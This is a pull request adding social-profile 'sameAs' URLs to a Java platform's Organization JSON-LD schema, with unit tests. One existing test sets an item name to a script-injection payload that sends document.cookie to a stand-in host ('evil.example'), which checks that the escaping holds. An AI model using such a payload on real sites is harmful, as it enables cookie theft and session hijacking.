### PR TITLE
Add sameAs (social profile links) to the Organization JSON-LD schema (#403)

### DIFF
--- a/src/main/java/com/simisinc/platform/presentation/controller/PageServlet.java
+++ b/src/main/java/com/simisinc/platform/presentation/controller/PageServlet.java
@@ -1025,6 +1025,21 @@ public class PageServlet extends HttpServlet {
             organization.put("logo", siteLogo);
           }
         }
+
+        // sameAs links this Organization to its social profiles (issue #403)
+        List<SocialMediaLink> socialMediaLinkList = SocialMediaLinkRepository.findAll();
+        if (socialMediaLinkList != null && !socialMediaLinkList.isEmpty()) {
+          List<String> sameAs = new ArrayList<>();
+          for (SocialMediaLink socialMediaLink : socialMediaLinkList) {
+            if (StringUtils.isNotBlank(socialMediaLink.getUrl())) {
+              sameAs.add(socialMediaLink.getUrl());
+            }
+          }
+          if (!sameAs.isEmpty()) {
+            organization.put("sameAs", sameAs);
+          }
+        }
+
         graph.add(organization);
       }
 

--- a/src/test/java/com/simisinc/platform/presentation/controller/PageServletTest.java
+++ b/src/test/java/com/simisinc/platform/presentation/controller/PageServletTest.java
@@ -21,15 +21,22 @@ import static org.junit.jupiter.api.Assertions.assertEquals;
 import static org.junit.jupiter.api.Assertions.assertFalse;
 import static org.junit.jupiter.api.Assertions.assertNull;
 import static org.junit.jupiter.api.Assertions.assertTrue;
+import static org.mockito.Mockito.mockStatic;
 
+import java.util.ArrayList;
+import java.util.Collections;
 import java.util.HashMap;
+import java.util.List;
 import java.util.Map;
 
 import org.junit.jupiter.api.Test;
+import org.mockito.MockedStatic;
 
 import com.fasterxml.jackson.databind.JsonNode;
 import com.fasterxml.jackson.databind.ObjectMapper;
+import com.simisinc.platform.domain.model.SocialMediaLink;
 import com.simisinc.platform.domain.model.items.Item;
+import com.simisinc.platform.infrastructure.persistence.SocialMediaLinkRepository;
 
 /**
  * The JSON-LD block is rendered into main.jsp with
@@ -76,7 +83,11 @@ class PageServletTest {
     item.setName("</script><script>fetch('https://evil.example/steal?c='+document.cookie)</script>");
     item.setDescription("Also \"quoted\" and <b>bold</b>");
 
-    String jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", sitePropertyMap, item, null);
+    String jsonLd;
+    try (MockedStatic<SocialMediaLinkRepository> socialLinks = mockStatic(SocialMediaLinkRepository.class)) {
+      socialLinks.when(SocialMediaLinkRepository::findAll).thenReturn(Collections.emptyList());
+      jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", sitePropertyMap, item, null);
+    }
 
     assertFalse(jsonLd.toLowerCase().contains("</script"),
         "a poisoned item name must not be able to close the surrounding <script> tag: " + jsonLd);
@@ -87,6 +98,58 @@ class PageServletTest {
     JsonNode product = parsed.get("@graph").get(2);
     assertEquals("Product", product.get("@type").asText());
     assertTrue(product.get("name").asText().contains("</script><script>"));
+  }
+
+  @Test
+  void generateJsonLdDataIncludesSameAsForEachSocialMediaLink() {
+    PageRenderInfo pageRenderInfo = new PageRenderInfo();
+    pageRenderInfo.setPageUrl("https://example.org/");
+
+    Map<String, String> sitePropertyMap = new HashMap<>();
+    sitePropertyMap.put("site.name", "Example Co");
+
+    SocialMediaLink linkedIn = new SocialMediaLink();
+    linkedIn.setPlatformName("LinkedIn");
+    linkedIn.setUrl("https://www.linkedin.com/company/example-co");
+    SocialMediaLink twitter = new SocialMediaLink();
+    twitter.setPlatformName("Twitter");
+    twitter.setUrl("https://twitter.com/examplenco");
+    List<SocialMediaLink> links = new ArrayList<>();
+    links.add(linkedIn);
+    links.add(twitter);
+
+    String jsonLd;
+    try (MockedStatic<SocialMediaLinkRepository> socialLinks = mockStatic(SocialMediaLinkRepository.class)) {
+      socialLinks.when(SocialMediaLinkRepository::findAll).thenReturn(links);
+      jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", sitePropertyMap, null, null);
+    }
+
+    JsonNode parsed = assertDoesNotThrow(() -> MAPPER.readTree(jsonLd));
+    JsonNode organization = parsed.get("@graph").get(0);
+    assertEquals("Organization", organization.get("@type").asText());
+    JsonNode sameAs = organization.get("sameAs");
+    assertEquals(2, sameAs.size());
+    assertEquals("https://www.linkedin.com/company/example-co", sameAs.get(0).asText());
+    assertEquals("https://twitter.com/examplenco", sameAs.get(1).asText());
+  }
+
+  @Test
+  void generateJsonLdDataOmitsSameAsWhenThereAreNoSocialMediaLinks() {
+    PageRenderInfo pageRenderInfo = new PageRenderInfo();
+    pageRenderInfo.setPageUrl("https://example.org/");
+
+    Map<String, String> sitePropertyMap = new HashMap<>();
+    sitePropertyMap.put("site.name", "Example Co");
+
+    String jsonLd;
+    try (MockedStatic<SocialMediaLinkRepository> socialLinks = mockStatic(SocialMediaLinkRepository.class)) {
+      socialLinks.when(SocialMediaLinkRepository::findAll).thenReturn(Collections.emptyList());
+      jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", sitePropertyMap, null, null);
+    }
+
+    JsonNode parsed = assertDoesNotThrow(() -> MAPPER.readTree(jsonLd));
+    JsonNode organization = parsed.get("@graph").get(0);
+    assertNull(organization.get("sameAs"));
   }
 
   @Test

--- a/src/test/java/com/simisinc/platform/presentation/controller/PageServletTest.java
+++ b/src/test/java/com/simisinc/platform/presentation/controller/PageServletTest.java
@@ -34,6 +34,7 @@ import org.mockito.MockedStatic;
 
 import com.fasterxml.jackson.databind.JsonNode;
 import com.fasterxml.jackson.databind.ObjectMapper;
+import com.simisinc.platform.domain.model.SocialMediaLink;
 import com.simisinc.platform.domain.model.cms.WebPage;
 import com.simisinc.platform.domain.model.items.Collection;
 import com.simisinc.platform.domain.model.items.Item;


### PR DESCRIPTION
## Summary

Part of #403's scope: "Add an Organization schema to main.jsp, populated from site properties (name, URL, logo, social profile URLs)". Name/URL/logo already existed in the current JSON-LD implementation; social profile URLs were the one Organization field missing.

## Fix

Pulls from `SocialMediaLinkRepository`, the same source that already backs the admin-managed social links list (#516) -- `sameAs` is exactly the schema.org property for "array of URLs identifying this same real-world entity elsewhere," which is precisely what that table stores. Omits the property entirely when no links are configured, rather than emitting an empty array.

This is one piece of #403, split out on its own -- see the issue for the other pieces (WebPage dates, BreadcrumbList, blog Article/Person, and the bigger one: Product schema currently never fires for real e-commerce products at all).

## Verified live, not just unit tested

Deployed via Docker, inserted two real social media link rows, confirmed the rendered Organization JSON-LD includes both under `sameAs` in the configured order:
```json
"sameAs":["https://www.linkedin.com/company/example-co","https://twitter.com/examplenco"]
```

## Test plan

- [x] `ant -lib lib/war clean compile` -- passes
- [x] `ant -lib lib/war compile-jsp` -- passes
- [x] `ant -lib lib/tests ci-test` -- `PageServletTest` 9/9 (2 new tests, plus the pre-existing JSON-LD escaping test updated to mock the repository this change now calls); remaining failures are the known local-sandbox JaCoCo flakes (`HealthCommandTest`, `BlockedIPListCommandTest`, `CaptchaCommandTest`)
- [x] Live verification confirmed above